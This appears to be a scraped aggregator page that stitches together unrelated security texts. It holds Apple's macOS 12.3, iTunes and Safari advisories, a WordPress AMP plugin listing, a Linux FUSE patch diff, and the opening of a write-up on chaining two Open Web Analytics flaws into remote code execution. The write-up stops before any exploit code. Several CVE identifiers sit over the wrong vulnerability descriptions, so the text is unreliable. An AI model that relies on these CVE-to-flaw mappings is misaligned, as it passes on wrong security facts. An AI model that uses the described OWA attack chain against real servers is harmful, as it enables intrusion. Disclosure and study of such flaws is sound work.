CVE-2022-22633: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22669: an anonymous researcher

**AppKit**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22631: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: An application may be able to read restricted memory

Description: This issue was addressed with improved checks.

CVE-2022-22648: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro

CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro

**BOM**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**curl**

Available for: macOS Monterey

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating to curl version 7.79.1.

CVE-2021-22946

CVE-2021-22947

CVE-2021-22945

CVE-2022-22623

**FaceTime**

Available for: macOS Monterey

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba Security Pandora Lab

**IOGPUFamily**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: macOS Monterey

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22640: sqrtpwn

**libarchive**

Available for: macOS Monterey

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**Login Window**

Available for: macOS Monterey

Impact: A person with access to a Mac may be able to bypass Login Window

Description: This issue was addressed with improved checks.

CVE-2022-22647: an anonymous researcher

**LoginWindow**

Available for: macOS Monterey

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22656

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-22657: Brandon Perry of Atredis Partners

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22664: Brandon Perry of Atredis Partners

**NSSpellChecker**

Available for: macOS Monterey

Impact: A malicious application may be able to access information about a user's contacts

Description: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.

CVE-2022-22644: an anonymous researcher

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22617: Mickey Jin (@patch1t)

**Preferences**

Available for: macOS Monterey

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**QuickTime Player**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-22650: Wojciech Reguła (@\_r3ggi) of SecuRing

**Safari Downloads**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**Sandbox**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran

**Siri**

Available for: macOS Monterey

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)

**SMB**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22651: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey Jin (@patch1t)

**System Preferences**

Available for: macOS Monterey

Impact: An app may be able to spoof system notifications and UI

Description: This issue was addressed with a new entitlement.

CVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**UIKit**

Available for: macOS Monterey

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**Vim**

Available for: macOS Monterey

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2021-4136

CVE-2021-4166

CVE-2021-4173

CVE-2021-4187

CVE-2021-4192

CVE-2021-4193

CVE-2021-46059

CVE-2022-0128

CVE-2022-0156

CVE-2022-0158

**VoiceOver**

Available for: macOS Monterey

Impact: A user may be able to view restricted content from the lock screen

Description: A lock screen issue was addressed with improved state management.

CVE-2021-30918: an anonymous researcher

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Monterey

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

**xar**

Available for: macOS Monterey

Impact: A local user may be able to write arbitrary files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2022-22582: Richard Warren of NCC Group

CVE-2022-22669: About the security content of macOS Monterey 12.3

Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.31).

*   Details
*   Reviews
*   Installation
*   Support
*   Development

AMP for WP automatically adds Accelerated Mobile Pages (Google AMP Project) functionality to your WordPress site. AMP makes your website faster for Mobile visitors.

What’s New in this Version? | Priority Support | View Demo | Screenshots | Community

**Extensions**  
Some useful extensions to extend AMP features, check AMP Adsense Support, Contact Form 7 Support, Email Opt-in Support and Call To Action Support. To view more, go to our Extensions page.

**Support**  
We try our best to provide support on WordPress.org forums. However, We have a special community support where you can ask us questions and get help about your AMP related questions. Delivering a good user experience means a lot to us and so we try our best to reply each and every question that gets asked.

**Bug Reports**  
Bug reports for AMP for WP are welcomed on GitHub. Please note GitHub is _not_ a support forum, and issues that aren’t properly qualified as bugs will be closed.

**Features:**

*   NEW – Gutenberg Support
*   NEW – Divi and Elementor Support More Info
*   NEW – GDPR Compliance
*   NEW – Google PageSpeed Optimization with SSR (Server Side Rendering)
*   NEW – CSS Optimization (Tree Shaking) – This will automatically remove all the unused CSS from your AMP pages
*   NEW – Google Font API and Local Fonts Support For All Designs
*   Out of the box compatibility for Yoast SEO, All in One Seo, Rank Math, Genesis, SEOPress, Bridge Qode SEO, The SEO Framework, SmartCrawl and Squrilly SEO Plugin.
*   Introducing Page Builder 3.0 for AMP! Learn More & Video
*   New Default Theme for AMP called Swift
*   3 Pre-built AMP Layouts for Business websites and landing pages
*   OneSignal and TruePush Push Notifications integration
*   Advanced WooCommerce Support More Info
*   AMP Plugins Manager – Which allows you to disable a specific plugin functionality only in the AMP version
*   Structured Data Options
*   Page Break / NextPage (Pagination) Support
*   Contact Form 7 Support More Info
*   Graviry Form Support More Info
*   Caldera Form Support More Info
*   Ninja Form Support More Info
*   Facebook Comments Support
*   Github Gist Support
*   Email Opt-in Subscription form support in AMP added
*   Call to Action boxes and notification bars
*   9 Advertisement sizes – 2 More AD slots added recently
*   Comments Forms in AMP.
*   Native AMP Search functionality.
*   Design 3 Watch the Video Overview
*   Disqus Comments Support
*   Vuukle Comments Support
*   Spot.IM Comments Support
*   Google Tag Manager Support
*   Page, Category & Tags Support Added
*   Custom AMP Editor – Which allows you to override your Content that you had written in Post or page, so you can add the different content just for AMP.
*   Mobile Redirection – More than 50% of your traffic is from mobile and you aren’t doing anything to improve their user experience, which means you are falling behind on SEO and it can result in lower SERPS. Lightning fast mobile version means faster User experience means more engagement which directly results in the lower bounce rate.
*   Custom Post Type Support
*   Custom Taxonomies Support
*   Star Ratings
*   Drag & Drop Page builder Added
*   4 Designs for AMP
*   AMP WooCommerce Support
*   Switch on/off Support for Pages & Posts on AMP
*   Translation Panel & RTL
*   Internal AMP linking – You can browse AMP pages internally
*   Related posts below the post
*   Recent Comments list
*   Automatically integrate AMP to your website.
*   Google Adsense (AMP-AD) Support with 6 different Ad slots across the layout! The First Plugin to have this capability.
*   Built in MGID Ads Support with 6 different ad slots.
*   Google Analytics Support.
*   User Friendly Theme Options Panel.
*   Unlimited Color Scheme.
*   Image Logo Upload.
*   Supports Posts and Pages and other custom post types.
*   Proper rel canonical tags which means that Google know the original page.
*   Overlay Navigation Menu bar.
*   Social Sharing in the Single.
*   Sexy Design.
*   Separate WordPress Menu for AMP version.
*   Page builder & Shortcodes Compatibility.
*   Carousel support for Gallery.
*   Better Image stretching and resizing.
*   Youtube Video Embed Support.
*   Vine Embed Support.
*   Twitter oembed Support.
*   Instagram Embed Support.
*   Facebook Video Embed Support.
*   RTL Support
*   Custom AMP FrontPage
*   Notifications
*   Alexa Metrics, Chartbeat, Hi-stats, Yandex Metrika, Piwik, Segment.com, StatCounter, Effective Measure and comScore Builtin Support
*   Incontent & DoubleClick Support
*   Great Support & Active Development.
*   Widgets & WooCommerce
*   Breadcrumb Support added
*   Facebook Instant Articles Support Added
*   AMP Installation Wizard that makes it easy to setup for new users.
*   Category base remover support
*   Tag base remover support
*   Addthis Sharing Support
*   Infinite Scroll Support
*   Photo Gallery by 10Web Support
*   12 New Social Media Integrations added (Reddit, Tumblr, Telegram, Digg, StumbleUpon, Wechat, Viber, Hatena Bookmarks, Pocket, Yummly, MeWe, Flipboard)
*   AMP Theme Framework Core Support Added. You can now create AMP templates of your own in just minutes. **More**
*   NEW – Make AMP & Non-AMP Same with just one click!
*   NEW – Allows you to use AMP as primary website!

**JOIN CHAT GROUP COMMUNITY**: Purpose of this group is to get proper suggestions and feedback from plugin users and the community so that we can make the plugin even better.

**Getting Started:**

**1\. User Documentation:** The AMP for WordPress plugin is easy to setup but we have some tutorials and guides prepared for you which will help you dive deep with the plugin.

**2\. Developer Docs:** We have created special documentations for developers and semi technical users who are willing to modify the plugin according to their own needs.

**3\. Support:** We try our best to provide support on WordPress.org forums. However, We have a special community support where you can ask us questions and get help about your AMP related questions. Delivering a good user experience means a lot to us and so we try our best to reply each and every question that gets asked.

**4\. Premium Support:** We will personally take care that your website’s AMP version is perfectly validated. We will make sure that your AMP version gets approved and indexed by Google Webmaster Tools properly and we will even keep an eye on AMP updates from Google and implement them into your website.

**Credits**

Some code used in this plugin was forked from ‘AMP for WordPress’ plugin https://wordpress.org/plugins/amp/ – License URI: http://www.gnu.org/licenses/gpl-2.0.html.  
Mobile & Tablet detection library used https://github.com/serbanghita/Mobile-Detect – License URI: https://github.com/serbanghita/Mobile-Detect/blob/master/LICENSE.txt  
PHP CSS Parser library used https://github.com/sabberworm/PHP-CSS-Parser – License URI: https://github.com/sabberworm/PHP-CSS-Parser#license (PHP-CSS-Parser is freely distributable under the terms of an MIT-style license.)  
AMP Optimizer library used https://github.com/ampproject/amp-toolbox/tree/main/packages/optimizer – License URI: https://github.com/ampproject/amp-toolbox#license (AMP Toolbox is made by the AMP Project, and is licensed under the Apache License, Version 2.0.)

**Visit Help area for the Documentation:**

**Visit Help area for the Documentation:**

**Can I add analytics?**

Yes, you easily can. In fact, we have support for 12 Analytics companies. Including Google Analytics, Facebook Pixel, StatCounter, QuantCast, Chartbeat, comScore to list a few. Also, we have Google Tag Manager (GTM) support as well.

**Can I add Ads in my AMP pages?**

Yes, you can. We have 6 ad placement slots that are built in and strategically placed to get maximum views. Also, we have an extension from which you can insert ads between the content, will get more ad slots and also add custom banners to all the available slots.

**Can I extend/Change the AMP design, so it suits my needs?**

Yes, you easily can. We have created this plugin in such a way that it can easily be extended. Check out our AMP Theme Framework

**Do you have any prebuilt designs?**

Yes, we have AMP themes section where we have free and paid designs available. We also update it regularly. You can check it out our AMP Themes

**I’m a developer and I want to add custom functionality for a client, can I do that?**

Yes, of course. This plugin is very developer friendly, we have lots of hooks and filters that you can use to extend and customize according to the requirements. Also, we have developer documentation which we update regularly.

**How do I report bugs and suggest new features?**

You can report the bugs here

**Will you Add New features to my request?**

Yes, Absolutely! We would suggest you send your feature request by creating an issue in Github . It helps us organize the feedback easily.

**How do I get in touch?**

You can contact us from here

![](https://secure.gravatar.com/avatar/07a56c90a427c263a8869831ac3d4dbd?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/77c97f0a2554cda5665547de84627aa7?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/a9ae7d27e349e44228648b192d446441?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/55d75b898bf4f3d2e17b0d039bad6ad1?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/92979f9c6fff838534ae94cc98d95b1c?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/6b099f0b6c687abe2e8b3a8ae45d1ac1?s=60&d=retro&r=g)

Cheaters, they offered the discount on their pricing page. But their discount disappeared in cart. i tried it many times, no discount was applied on my order. i contacted many times the support team, but every time they offers me 50% discount on new purchase to compensate, they are not ready to return my extra charged money. moreover, plugin is full of waste, because of their unprofessional services.

Read all 1,208 reviews

“AMP for WP – Accelerated Mobile Pages” is open source software. The following people have contributed to this plugin.

Contributors

**1.0.77.38 (7th March 2022)**

*   Improvements: Added The Publisher Desk Support #5213
*   Fixed: Displaying a blank white screen when embed URLs are used #5193

1.0.77.37.1 (4TH March 2022)  
\* Improvements: Added new infinite scrolling experience #4791  
\* Fixed: The links in embed URLs are not clickable #5193

**1.0.77.37 (2nd March 2022)**

*   Improvements: Added feedback form with auto email system #5223
*   Improvements: Added new infinite scrolling experience #4791
*   Improvements: Added An option to add lang\_ and privacyMode values in Quantcast #5206
*   Improvements: Added FireWork compatibility #5210
*   Fixed: AMP autocomplete tag is not working #5217
*   Fixed: Autoplay functionality not working in video module #5219
*   Fixed: Fonts loading twice in Global font family #5220
*   Fixed: Unable to connect to Matomo analytics #5221

**1.0.77.36 (18th February 2022)**

*   Fixed: If the server-side cache is aggressive then the pagination URL with ?amp=1 is redirecting to non-AMP #5208
*   Fixed: Errror getting in featured-image.php, on line 77 #5207
*   Fixed: Need to keep the mobile redirection filter outside of any condition #5216

Full changelog available at changelog.txt

CVE-2021-23150: AMP for WP – Accelerated Mobile Pages

A flaw use after free in the Linux kernel FUSE filesystem was found in the way user triggers write(). A local user could use this flaw to get some unauthorized access to some data from the FUSE filesystem and as result potentially privilege escalation too.

In FOPEN\_DIRECT\_IO mode, fuse\_file\_write\_iter() calls fuse\_direct\_write\_iter(), which normally calls fuse\_direct\_io(), which then imports the write buffer with fuse\_get\_user\_pages(), which uses iov\_iter\_get\_pages() to grab references to userspace pages instead of actually copying memory. On the filesystem device side, these pages can then either be read to userspace (via fuse\_dev\_read()), or splice()d over into a pipe using fuse\_dev\_splice\_read() as pipe buffers with &nosteal\_pipe\_buf\_ops. This is wrong because after fuse\_dev\_do\_read() unlocks the FUSE request, the userspace filesystem can mark the request as completed, causing write() to return. At that point, the userspace filesystem should no longer have access to the pipe buffer. Fix by copying pages coming from the user address space to new pipe buffers. Reported-by: Jann Horn <jannh@google.com> Fixes: c3021629a0d8 ("fuse: support splice() reading from fuse device") Cc: <stable@vger.kernel.org> Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>

diff --git a/fs/fuse/dev.c b/fs/fuse/dev.c  
index cd54a529460da..592730fd6e424 100644  
\--- a/fs/fuse/dev.c  
+++ b/fs/fuse/dev.c

@@ -941,7 +941,17 @@ static int fuse\_copy\_page(struct fuse\_copy\_state \*cs, struct page \*\*pagep,

while (count) {

if (cs->write && cs->pipebufs && page) {

\- return fuse\_ref\_page(cs, page, offset, count);

\+ /\*

\+ \* Can't control lifetime of pipe buffers, so always

\+ \* copy user pages.

\+ \*/

\+ if (cs->req->args->user\_pages) {

\+ err = fuse\_copy\_fill(cs);

\+ if (err)

\+ return err;

\+ } else {

\+ return fuse\_ref\_page(cs, page, offset, count);

\+ }

} else if (!cs->len) {

if (cs->move\_pages && page &&

offset == 0 && count == PAGE\_SIZE) {

diff --git a/fs/fuse/file.c b/fs/fuse/file.c  
index 8290944517749..0fc150c1c50bd 100644  
\--- a/fs/fuse/file.c  
+++ b/fs/fuse/file.c

@@ -1413,6 +1413,7 @@ static int fuse\_get\_user\_pages(struct fuse\_args\_pages \*ap, struct iov\_iter \*ii,

(PAGE\_SIZE - ret) & (PAGE\_SIZE - 1);

}

\+ ap->args.user\_pages = true;

if (write)

ap->args.in\_pages = true;

else

diff --git a/fs/fuse/fuse\_i.h b/fs/fuse/fuse\_i.h  
index e8e59fbdefebe..eac4984cc753c 100644  
\--- a/fs/fuse/fuse\_i.h  
+++ b/fs/fuse/fuse\_i.h

@@ -256,6 +256,7 @@ struct fuse\_args {

bool nocreds:1;

bool in\_pages:1;

bool out\_pages:1;

\+ bool user\_pages:1;

bool out\_argvar:1;

bool page\_zeroing:1;

bool page\_replace:1;

CVE-2022-1011: kernel/git/mszeredi/fuse.git - FUSE

A memory consumption issue was addressed with improved memory handling. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to heap corruption.

This document describes the security content of iTunes 12.12.3 for Windows.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

![](https://support.apple.com/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)

**iTunes 12.12.3 for Windows**

Released March 8, 2022

**ImageIO**

Available for: Windows 10 and later

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: Windows 10 and later

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**WebKit**

Available for: Windows 10 and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: Windows 10 and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

![](https://support.apple.com/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png) 

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: March 14, 2022

CVE-2022-22612: About the security content of iTunes 12.12.3 for Windows

A user interface issue was addressed. This issue is fixed in watchOS 8.5, Safari 15.4. Visiting a malicious website may lead to address bar spoofing.

This document describes the security content of Safari 15.4.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

![](https://support.apple.com/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)

**Safari 15.4**

Released March 15, 2022

**Safari**

Available for: macOS Big Sur and macOS Catalina

Impact: Visiting a malicious website may lead to address bar spoofing

Description: A user interface issue was addressed.

CVE-2022-22654: Abdullah Md Shaleh of take0ver

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

![](https://support.apple.com/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png) 

**Additional recognition**

**WebKit**

We would like to acknowledge Abdullah Md Shaleh for their assistance.

**WebKit Storage**

We would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: March 15, 2022

CVE-2022-22654: About the security content of Safari 15.4

Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.

Open Web Analytics (OWA) is an open-source alternative to Google Analytics. OWA is written in PHP and can be hosted on an own server. Version 1.7.3 suffers from two vulnerabilities, which can be exploited by an unauthenticated attacker to gain RCE, when chained together.

The cause of the first vulnerability (CVE-2022-24637) is a single quote / double quote confusion, which leads to an information disclosure. The header of an automatically generated PHP cache file containing sensitive information is defined as '<?php\\n…' instead of "<?php\\n…". This leads to a literal backslash and n character being written instead of a newline character resulting in a broken PHP tag. Because of this the file is not interpreted as PHP code, but delivered in plain leaking sensitive cache information. This information can be leveraged to set a new password for the admin user.

The second vulnerability is a PHP file write, which requires admin privileges. The internal settings for the logfile path as well as the log level can be changed by manually crafting a POST request. This way the logfile can be set to a PHP file. By also increasing the log level and generating an event with attacker controlled data, PHP code can be injected into this logfile. This results in the possibility to execute arbitrary PHP code.

I would like to thank Peter Adams, the creator and maintainer of OWA who released a patch for the issue only one day after my initial notification. I was really amazed by the quick and professional reaction. There are security issues in each and every software, but the difference is how these are dealt with.

– Introduction  
– Single / Double Quote Confusion  
– PHP file write  
– Demonstration  
– Patch and Mitigations  
– Conclusion

**Introduction**

Open Web Analytics (OWA) is an open-source web analytics software written in PHP and using a MySQL database. The source code is freely available on GitHub. OWA offers profound tracking capabilities as well as a wide variety of detailed reports. In contrast to Google Analytics, OWA can be hosted on an own server.

In this article we will take a look at two vulnerabilities in OWA, which enable an unauthenticated attacker to gain RCE on the underlying webserver when combined. After determining the root cause of these vulnerabilities, we will point out how these can be mitigated and highlight a few general aspects regarding secure coding.

A basic entity in OWA is represented by the owa\_entity class. Examples for such entities inheriting from owa\_entity are documents (owa\_document), sites (owa\_site) or users (owa\_user). These entities are persisted in the MySQL database. In order to increase performance, OWA version 1.7.3 and prior uses a file based caching mechanism by default. When an entity is loaded from the database the first time, it is cached by writing its serialized data to a cache file.

The creation of these cache files is implemented in the putItemToCacheStore method within the owa\_fileCache class (modules/base/classes/fileCache.php):

...

    function putItemToCacheStore($collection, $id) {
    
            ...
        
            $data = $this->cache\_file\_header.base64\_encode(serialize($this->cache\[$collection\]\[$id\])).$this->cache\_file\_footer;

            ...
            
            $tcf\_handle = @fopen($temp\_cache\_file, 'w');

            ...
            
                fputs($tcf\_handle, $data);
                
                ...

As we can see, the serialized entity is base64 encoded and written to a temporary cache file. The name of this temporary file is later changed to consist of a unique id with a .php extension:

            ...
            
            $cache\_file = $collection\_dir.$id.'.php';
    
            ...
            
                if (!@ rename($temp\_cache\_file, $cache\_file)) {
                
                    ...

In the first code snippet we can also see that the base64 encoded data is prefixed by cache\_file\_header and suffixed by cache\_file\_footer. Let’s see how these are defined:

...

class owa\_fileCache extends owa\_cache {

    ...
    
    var $cache\_file\_header = '<?php\\n/\*';
    var $cache\_file\_footer = '\*/\\n?>';
    
    ...

Accordingly a cache file is supposed to look like this:

<?php
/\*BASE64-ENCODED DATA\*/
?>

When directly accessing such a PHP file, the response is supposed to be empty, because the file only contains a comment. Though the above strings are surrounded by single quotes instead of double quotes, which makes a severe difference when it comes to escape sequences:

php > echo '<?php\\n/\*'; // <-- single quotes
<?php\\n/\*

php > echo "<?php\\n/\*"; // <-- double quotes
<?php
/\*

As the above example shows, when using single quotes, escape sequences such as \\n are not evaluated.

What does this mean for the generated PHP file? The PHP tag <?php is supposed to be followed by a line feed (0x0a) like this:

user@b0x:~$ cat sample1.php 
<?php
echo 1;
?>

user@b0x:~$ php -f sample1.php
1

Valid alternatives for the line feed are tab (0x09), carriage return (0x0d) or space (0x20). Though, when the PHP tag is directly followed by a backslash character, it is no a valid PHP tag anymore and the PHP code is not interpreted, but rather displayed in plain:

user@b0x:/tmp$ cat sample2.php
<?php\\necho 1;\\n?>

user@b0x:/tmp$ php -f sample2.php
<?php\\necho 1;\\n?>

Since the PHP cache files are publicly accessible (owa-data/caches/), we can retrieve the base64 encoded serialized data. In order to do this, we need to know the name of the cache file. Though it turned out, that the filename is predictable. If the admin user at least logged in once, the cache file exists. But even if the user never logged in, we can trigger the creation by trying to login with this user. The failed login attempt does also create the cache file.

After calculating the filename, we can easily retrieve the cache file:

